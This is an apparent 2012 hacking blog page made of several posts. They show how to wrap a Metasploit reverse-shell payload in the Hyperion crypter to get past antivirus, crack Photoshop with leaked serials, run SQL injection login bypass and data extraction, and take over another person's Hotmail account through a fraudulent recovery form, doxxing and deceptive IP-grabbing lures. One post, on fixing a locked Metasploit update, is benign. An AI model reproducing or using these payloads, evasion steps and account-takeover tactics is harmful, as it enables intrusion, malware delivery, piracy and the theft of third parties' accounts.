Thursday 15 November 2012

Bypassing Antivirus with PE Crypters by Shubham Mittal (@k@ Upgoingstaar)

05:31  , , ,  No comments
Well most of the time when we do penetration test, we are facing a super cool AV protection which stops us to execute our lovely EXEs, shellcodes, etc.

I was looking around the same and from a presentation of Mr. Dave Kennedy at DerbyCon, i got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging it here and there, i found that shellcodexec is a small utility to inject a Shellcode into any process and thus execute your malicious intentions. This is done with approach that when there is no file at all, what signature will AVs match? However shellcodexec is itself getting caught nowadays and therefore I will not suggest you to go for it.

On the other hand, PE Crypters (from Nullsecurity team) will encrypt a Binary file with a sexy crypting approach and thus can be used to bypass the AV.The whole project is running under the name of HYPERION project and is a proper working way to mess around with AVs. So lets start.

Well there has been great stuff for AVs detecting the templates with which we encrypt our EXE and likely the decryption approach of the program to reach the actuall offset, AVs started doing the same with the result of "Detection". In this PE Cryters, payload is not scrambled, instead it is encapsulated. A different key as a cipher is used every time and at the time of execution, Brute Force can be done. So it will take time, huh? Well yeah it will take time if our key is long. We will keep our key short and everything will go fine. This is whot Hyperion Pe Crypters will do; in short. A weak 128 bit AES key is used to encapsulate the packet which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf)

Anyways, for super cool guys, this was enough. But as only the Source files are available by now, For those who are new to these things, that can be a little troublesome :P; Well let me give a go through. First of all choose your platform; M preferring Linux all the way but its your system, and your choice too.

Next Download the project;
or use: wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip



















Uzip It.

unzip Hyperion-1.0.zip
























Change the directory, and compile it.

cd Hyperion-1.0.zip

wine /root/drive_c/MinGW/bin/g++  Src/Crypter/*.cpp -o shubham.exe



Once you have created executable for Crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for reverse connection and once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.

Create the Payload.4
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe





Scan it. 
Once the payload is ready, we will scan it first (without crypting).





Lets Crypt it with Hyperion.

wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe

ls -l





Scan it.
No Detection






Execute it.
As soon as you will execute it, it will start brute forcing which will make the CPU Usage 100%.





Enjoy It.
As soon as the brute force will get over, CPU Usage will reduce to normal and a session will get generated.






I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)
Continue Reading

MSF not updating : Working Copy '.' Locked. Suggestion for SVN

05:20  , ,  No comments
Welcome Friends, I Am Posting A New Tutorial by Shubham Mittal(@k@ upgoingstaar) and his Blog(Must read) 
http://3ncrypt0r.blogspot.in/
So Get Ready To Be A G33k With Him. Enjoy Tutorial...


 Most of the time when we come across some new exploits in the market and expect them in our msf instance, your framework stucks at some point while updating and you have a reason for your dissappointment. You try with some Googling but it doesnt help you as most of the prople instead of answering, are fighting, arguing and posting lame things on those forums.

To solve this for newbies, I am therefore writing this article, hwoever if you enjoy digging the things on your own (which is the best practice to make you strong conceptually, learnt this one of highly experienced senior), this is not for you.

There can be lot of reasons for not being able to update msf. One of them i included in my last post, 

http://3ncrypt0r.blogspot.in/2012/08/msfupdate-not-working-solution.html

The other one i am including today.

generally when we do update we have to sit long back to back as the update stucks, it comes back with error which seems something like this when you run msfupdate.

svn : Working copy '.' locked
svn : run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)

IMAGES ARE SMALL IN VIEW; CLICK THEM FOR LARGER VIEW.






Reason: SVN not being able to handle the situation. 

What is SVN? 

SVN is a program which keeps track of all the different versions of our source files. You can give a read to it on this Wiki page.

Solution: 

It tries to resolve the issue on its own and suggest you to run "cleanup" at the directory which is getting locked. If it works, Congratulations". In most of the cases it will not work and you will see something like this:



In my case i was getting the error at "/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support" directory. 

I guessed it was getting locked at some file within the directory but as the files don't appear in the folder when it is bieng synchronized with git, so you can't delete that particular file. Better remove the directory itself. So i deleted my that particular directory:



I was a bit unlucky that day so it didnt solved the situation. But as we must leave the things unsolved go through the error and and try to figure it out. Again it was locked at some other directory : 



So without any laziness, delete it too.



As a precaution to avoid further error messages (I HATE ERRORS, seriously), so run this:



Most probably you have figured it out, so try msfupdate now.



And perhaps this will give you a smile.



Suggestions and queries are always welcomed.
KEEP EXPLOITING.
Continue Reading

Adobe Photoshop CS5 Cracking Tutorial To Show The Importance of Host File in Windows

03:29  ,  No comments


Thanx For Being Here...
Suppose i'm a web-designer and i want to Use Photoshop CS5 For Giving Extreme Graphics To my Projects or websites. then in that case i will use a maximum tools and resources available in Photoshop CS5 But the Problem is Photoshop Activation and registration...
So, Today I am Telling you about cracking Adobe Photoshop CS5.


 Step By Step Guide :~#

  • Download  Adobe Photoshop from the official site of Adobe .
  • After installing the trial version, now go to 


C:\WINDOWS\system32\drivers\etc\



  • Then after going there you have to replace the file named "Hosts" with a new hosts file  - Download
  • After you have replaced the file, just open the registration window & enter any of the serial number from below . 


1330-1036-2793-5476-2605-5729
1330-1193-9982-0310-7670-2199
1330-1470-0441-6829-3063-2553
1330-1976-0892-7993-3728-5629
1330-1527-2207-3657-2876-1004
1330-1361-6390-5309-5916-6481
1330-1614-6955-3965-0930-9043
Continue Reading

How to make free International calls from Private Number

03:02    No comments
How Are You Friends...
Today is Your Another Lucky Day, coz i'm back with a amazing tutorial about making fake calls...
Yes We Can Say A Fake Call...From An international no.

Follow My Steps as you always Do :D
Step 1&last.
Goto www.evaphone.com and create a account and they will offer you free call with Private Number.
 
Continue Reading

Sql Injection Part 1 Hacking Admin Panels Using sql Authentication bypass

02:19    No comments

Welcome To All Readers Of The Mindbenders
SQL Injection

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.


SQL Injection - 1 Authentication Bypass
Before we jump to the main topic, some basics…
SQL : Structured Query Language
It is meant for the communication between application and the database.

select : select is used to select the data.
insert : insert is used to insert the data.
update : update is used to update the data.
delete : delete is used to delete the data.

Some basic queries with examples
select * from <table name>;
> select * from news;
select <column name> from <table name>;
select news_title from news;
select <col1>, <col2> from <table name>;
> select news_content,news_title from news;
select <col1>, <col2> from <table name> where <col>=<val>;
> select news_content,news_title from news where ID=3;
select * from user_login where uid='<value>' and pass='<value2>';
select * from user_login where uid='name' and pass='password';
select * from admin where admin_id='admin' and pass='admin';
Now instead of password text we can enter this key for authentication bypass
'or'0'='0

The query structure will become
select * from admin where admin_id='admin' and pass=''or'0'='0';

Admin Pages can be somewhat like this,

/admin
/admin.asp
/admin.aspx
/admin.php
/administrator
/administrator.asp
/administrator.aspx
/administrator.php
/user
/user.php
/user.asp
/user.aspx
/login
/login.asp
/login.aspx
/login.php
/Admin
/Admin.asp
/Admin.aspx
/Admin.php
/Administrator
/Administrator.asp
/Administrator.aspx
/Administrator.php
/userlogin
/userlogin.asp
/userlogin.aspx
/userlogin.php
/Adminlogin
/Adminlogin.asp
/Adminlogin.aspx
/Adminlogin.php
/AdminLogin
/AdminLogin.asp
/AdminLogin.aspx
/AdminLogin.php
/newuser
/newuser.asp
/newuser.aspx
/newuser.php
/Newuser
/Newuser.asp
/Newuser.aspx
/Newuser.php
/NewUser
/cms

SQL Injection - 2 Union Based Injection

Again Some Basics,
order by : is used for the sorting purpose.

union : is used to select all the data but it wont repeat the same data.
a = {1,2,3,4}
b = {1,2,3,4,5,6,7}
a U b = {1,2,3,4,5,6,7}

database: is a group of tables.

table : is a group of columns & rows.

column & row : will store the data.

Information Schema: information schema is the information database, the place
that stores information about all the other databases that the MySQL server
maintains. We can access the information by using it‟s objects tables and columns.

information_schema.tables: It contains all the information about the tables.

Information_schema.columnsIt contains all the information about the columns

i.e.: db1 (It could provide you information about its own database.)
       db2 (It could provide you information about its own database.)
       db3 (It could provide you information about its own database.)
But
information_schema will be storing info about all db1,db2,db3

table_name: is used to represent the name of the tables.

column_name: is used to represent the name of the columns.

version(): to see the database version

user(): to see the default user of the database

database(): to see the name of the database

concat() , group_concat(): is used for the concatination purpose.

Step:1 find something=something
           i.e. : id=2, catid=5, prod=savita
           www.site.com/page.php?id=1
           apply '
           if it is generating any error, blank page, data missing
           > good news for us !!!
           > website may be vulnerable.

Step:2 To see the number of columns which are displaying the data.
[ Remove ' ]
note: whatever data we see on the page must be fetched from some database ->
tables -> columns
> and not only 1 column but more than 1 column from different tables must be
displaying the data.
i.e. : www.site.com/page.php?id=1 order by 1 -- || n
        www.site.com/page.php?id=1 order by 2 -- || n
        www.site.com/page.php?id=1 order by 3 -- || n
        www.site.com/page.php?id=1 order by 4 -- || n
        www.site.com/page.php?id=1 order by 9 -- || n
        www.site.com/page.php?id=1 order by 10 -- || Error

so there are 9 columns which are fetching the data.

Step: 3 To see the visible column
union select will be used.
union select 1,2,3,4,5,6,7,8,9 --
i.e.:    www.site.com/page.php?id=1 union select 1,2,3,4,5,6,7,8,9 –
to avoid the by default data
          www.site.com/page.php?id=-1 union select 1,2,3,4,5,6,7,8,9 --

step: 4 Get the table names
i.e. :      www.site.com/page.php?id=-1 union select 1,table_name,3,4,5,6,7,8,9 from
information_schema.tables --

Admin

Step:5 Get the column names
i.e. :     www.site.com/page.php?id=-1 union select 1,column_name,3,4,5,6,7,8,9 from
information_schema.columns where table_name='admin' --

username
password

Step:6 Get the data.
i.e.:      www.site.com/page.php?id=-1 union select 1,password,3,4,5,6,7,8,9 from
admin --

username : admin
password : adminpass

Sometimes, while fetching the columns we may face some error, so we need to
convert table name(string) to ascii.
use: http://easycalculation.com/ascii-hex.php
string: admin
Equivalent Ascii Value : char(97,100,109,105,110)

Sometimes, while fetching the table names, we may see only one table name,
to fetch all the tables we have to use
group_concat(table_name)

sometimes, we may face a situation to count the number of tables, so
count(table_name)

Sometimes, we may need to fetch the name of the tables within the viewsize of the
page.
limit 0,1 -- to see the 1st table name

Sometimes, we need to see username and password all together,
group_concat(user,0x3a,pass) || user:pass
HackBar - add on of firefox

SQL Injection - 3 Error Based Injection

Step: 1 find something=something
i.e.: id=3, catid=3, uid=3 etc etc etc
and apply '

Step: 2 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
table_name from information_schema.tables)) –

Let‟s understand the query.
and 1=convert(int,(select top 1 table_name from information_schema.tables)) –

from this, you have already understood
select top 1 table_name from information_schema.tables

but only top 1 is unfamiliar with you, top 1 will be pointing to the 1 st table name
from the information_schema.tables

Let‟s assume that we got the one name that is “ABCD”
and 1=convert(int,(ABCD)) –

It will try to convert ABCD to the integer. String to Integer conversion is not
possible directly so it will definitely generate an error.

The error will be containing the name of a table.
So, we have got the one table, if we want to fetch the 2nd table then we may need
to
http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1 table_name
from information_schema.tables where table_name not in(„ErrorTable‟))) –

this will display you the 2nd table, to see more tables, you can put the name of the
tables in not in(„ErrorTable1‟,‟ErrorTable2‟)

Step: 3 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='ErrorrTable'))
--

Now if we want to fetch the 2nd column name then, the query would be somewhat
like,

http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='ErrorTable'
and column_name not in('ErrorColumn1'))) –

http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='ErrorTable'
and column_name not in('ErrorColumn1',‟ErrorTable2‟))) –

After finding the table name and the column name we can fetch the data.


Step: 4 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
ErrorColumnName from ErrorTableName)) --
Continue Reading

Wednesday 14 November 2012

Hack Almost any Hotmail account without keylogger , Phishing in 24 hours

21:32    2 comments

Welcome To All, I see alot of new members joining, and wanting to learn how to hack somebodies hotmail account..or asking others to do it for them.
Most are under the illusion that there's this "hack" button you can press and you instantly get their password, however this is not the case.
Most newb's are put off by the fact that they have to keylog or phish their way into getting a password, and they resort to asking the "hackers".
But i'll provide an easy alternative.

This method is called Reverting, and you will be sending a form in to microsoft customer support to reset the password for your (or somebody elses) hotmail account.

NOTE: If you are interested in protecting yourself against this hacking method, please refer to this Blog.

For this method, it helps to know the person, even a little, but i'll still give you a step-by-step tut on how to find the information and fill out each part of the form.

NOTE: THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY, I AM NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM THIS.

Step 1: go here:

https://support.live.com/eform.aspx?prod...mcs&scrx=1

Step 2: Give them your victims full name.

Now, if you do not know their first name, try the following things to find it.

First, try using these two sites, simply enter their email and hit return.

http://www.pipl.com/email
http://com.lullar.com

if you want more, google their hotmail account(s), for example, type into google:

"victimshotmail@hotmail.com"


Include the quotes, cause this searches for only the hotmail account.
If you gain any results, it will most likely be forums or if you're lucky, social networking sites, that they have filled out their info on.
Go through these searches, and look at every one, even make a .txt file in notepad pasting down all the info you can on them.
Once you're done, if you havnt got their last name, keep reading..if you have, goto step 3.

Presuming you dont yet have their last name, try going to social networking sites, like:
http://www.myspace.com
http://www.facebook.com
http://www.bebo.com
http://www.friendster.com

Or any others you can think of, and search for their hotmail account using the websites search feature.
if you get any results, you're in luck, most of the time people include alot of information on themselves in there. Follow any leads you can find on the info, and even ask them or their friends (look up a tutorial on social engineering info out of people first, it will help).

Now another thing you can do is use http://www.whois.com IF your slave has their own website.

If you dont have it by now, maybe you should find an easier target, or if you're desperate, use this technique to hack one of their rl best friends, and alot of the time they have their full name assigned to your victims hotmail address, in their addressbook.

Or, I sometimes just say "I'm pretty sure I only put in my first name at registration, I'm paranoid like that" or something along those lines... It's worked for me.

BTW: This is called d0xing, or "documenting", basically harvesting info on people, it's completely legal as long as you get all your info from the public domain (forums, social networking sites etc).

Step 3: The e-mail address for us to send a response:
Simple, give them your email address... could use a fake one if you're paranoid (one you got access too), but I don't see any risk.

Step 4: Primary e-mail address/member ID associated with the account you are inquiring about:
Here you put in your victims email address (the one you're trying to hack). Then click Continue.

Step 5: Date of birth.
You can simply give them the year, if you dont know any further then that..but if you want to be on the safe side, read step 2, and use those techniques to find their date of birth.

Step 6: Country
If you dont know their country, which you probably should, use their IP address which you will have in one of the next steps to find it, by using
http://www.ip-adress.com/ip_tracer/

Step 7: State
same deal, use their IP addy if you dont know it already

Step 8: ZIP or postal code
Same deal again, it's usually correct if you use the IP addy...just use http://www.ip-adress.com/ip_tracer/
and find their town/suburb or whatever, and google the ZIP code for it.

Step 9: The secret answer to your question
simply put "i dont remember"

Step 10: Your alternate email address
for this, you just put in the email address you're trying to hack, you dont need their alternate email address.

Step 11: Your IP Address
Okay so here's probably the toughest one, but it's still easy. (NOTE: It's very hard to revert an account unless you successfully complete this step)
There's alot of ways to get their IP, i'll give you the easy ones.

Email: Get them to send you an email somehow, it doesnt matter how, you can just send an email saying:
"hey, how are you?" and they'll probably reply. Once you have their email (dont use old emails, please, everybody uses dynamic IP's these days)
right click on it, and click "view source", you will see something like this:

...now you want to find "X-Originating-IP: [XX.XXX.XX.XX]" That is their IP address. If the email source is all jibberish and looks encrypted, try what one user suggested:

(09-24-2010 07:59 AM)TOMMIE Wrote: 
This is from Hotmail? Right? I get this too..
I forwarded these emails to my broadband providers base email (NOT Webmail), then selected each one and `Save as`, it will prompt you to save in .eml format - save to desktop, then right-click and open in Notepad. You will see detail then.
hth

Website: Go here http://www.syntaxmaster.info and register an account for free, it's real easy.

Now once you're registered, go to Software/Tools > IP Stealer; and then you can type in the URL you want your IP stealer to redirect to.. so just google or myspace or something will do. Now you'll see above that they give you your URL, you just send them there and it'll grab their IP, redirect them to google (or whatever site you choose), and then show their IP down at the bottom of the page.

I suggest using spam or http://www.doiop.com/ to shorten your URL and make it custom, you could make it something like:

http://www.doiop.com/profile-329479

And viola it'll look like a social networking site "Hey, I'm katie. :) I'm looking to meet new people and was wondering if you wanted to be friends? ^_^ This is my profile btw: <give fake link>"

Something like thaat. :p

MSN: if you can talk to them on msn, then you can get their IP that way too..there's two ways, either download a easy-to-use script, or do it manually with cmd,
i'll show you how to do it manually first.

Manually: Send them a file, or get them to send you a file.
"hey, i love that song, can you send me it?" or "omg, this is the funniest picture ever".
Before you start the transfer though, goto start > run (if you're using vista, just press the windows key) and type in cmd, and hit enter.

type in the following: netstat -n

and hit enter, it will show you a list of active connections to different IP's.

Remember or take a screenshot of those IP's, because once you start the transfer, type in netstat again while it's transferring and check for any new IP's, that is your victims IP.

With a script:
IF you have windows live messenger plus (probably the best WLM IMO), download this script:
http://rapidshare.com/files/133356881/IPGet_1.50.rar
It's called IP-Get, and will show you your current msn contacts IP addresses IF you're currently connected to them with a fileshare. It will also allow you to save the IP addresses, and look up their locations.

Here is a screenie of IP-get:


There are other ways, but surely, you should have been able to get their IP by now...if not, look up a tut on it, using the search feature.

Step 12: Your internet service provider
very easy to find, use their IP, either using the IP get script if you have it, or http://www.ip-adress.com/ip_tracer/

Step 13: The last date and time that you successfully signed in
Unless you know this as a fact, either take your best guess, say you dont remember, or yesterday.

Step 14: The names of any folders that you created in addition to the default folders
leave this blank, or say you dont know (unless you know this for a fact).

Step 15: Names of contacts in your hotmail address book
give them all the contacts you know are definately or most likely in there, including yourself, and even their other accounts (they might add themselves, everybody seems to). Also give them wilma@live.com and smarterchild@hotmail.com, as most people have them added.

Step 16: Subjects of any old mail that is in your inbox
okay just use common sense for this one, things to include are:
hey, how are you, RE:, FW:, admin, windows live, hotmail staff, recovery, registration, support, lol, password, comfirmation, noreply, delivery status notification (failure).

Also, if they are subscribed to any forums (like hackforums(but please dont hack other members :p)), social networking sites (like myspace, bebo) or online games (like RuneScape, WoW), then be sure to include them too.

Step 17: Names of contacts on your messenger contact list
If you happen to know any of their friends, this is where you put their display name...if you dont have them added, put their first names, and if you dont know them at all, just leave it blank, or say you dont remember.

Step 18: Your Messenger nickname
If you know it, put it in..if you dont, say "i cant remember it exactly" or leave it blank.

Step 19:
The rest you dont really need to worry about, except for in additional info, can put anything else that might make you sound more convincing..like:

"please do your best to recover my account, i dont want to go and have to add all my friends again, it'd be a great help if you got it back for me, thank you in advance."

obviously dont put exactly that, but you get the gist of it :)

Okay, i believe that is it, within 24 hours you will recieve an email from customer support, they will either give you a link to reset your (victims) password, or ask for you to send it again with more info, as an email reply..and in that case, you dont have much luck, cause they can just get your IP address from the email and know you're lying :) so try again, and hope you get a more gullible staff member. If you have firefox, 

I did give you a link to download earlier, here is a virus scan for you guys who arent sure.

Quote:
File Info

Report generated: 1.7.2009 at 14.45.40 (GMT 1)
Filename: IPGet_1.50.plsc
File size: 721 KB
MD5 Hash: 081f4ed7f145689e1911b16fc49fa4b4
SHA1 Hash: 3B9348B972ACA7006F9E38951EE76AB632F54EF0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 24

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
Malware Hash Registry - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -

Scan report generated by
NoVirusThanks.org

If you have any questions, ask here,  I didn't rip any of this from other tuts, typed it up myself. Thanks for reading, I know it's long, I've reached the max character limit
Continue Reading
Subscribe to: Posts (Atom)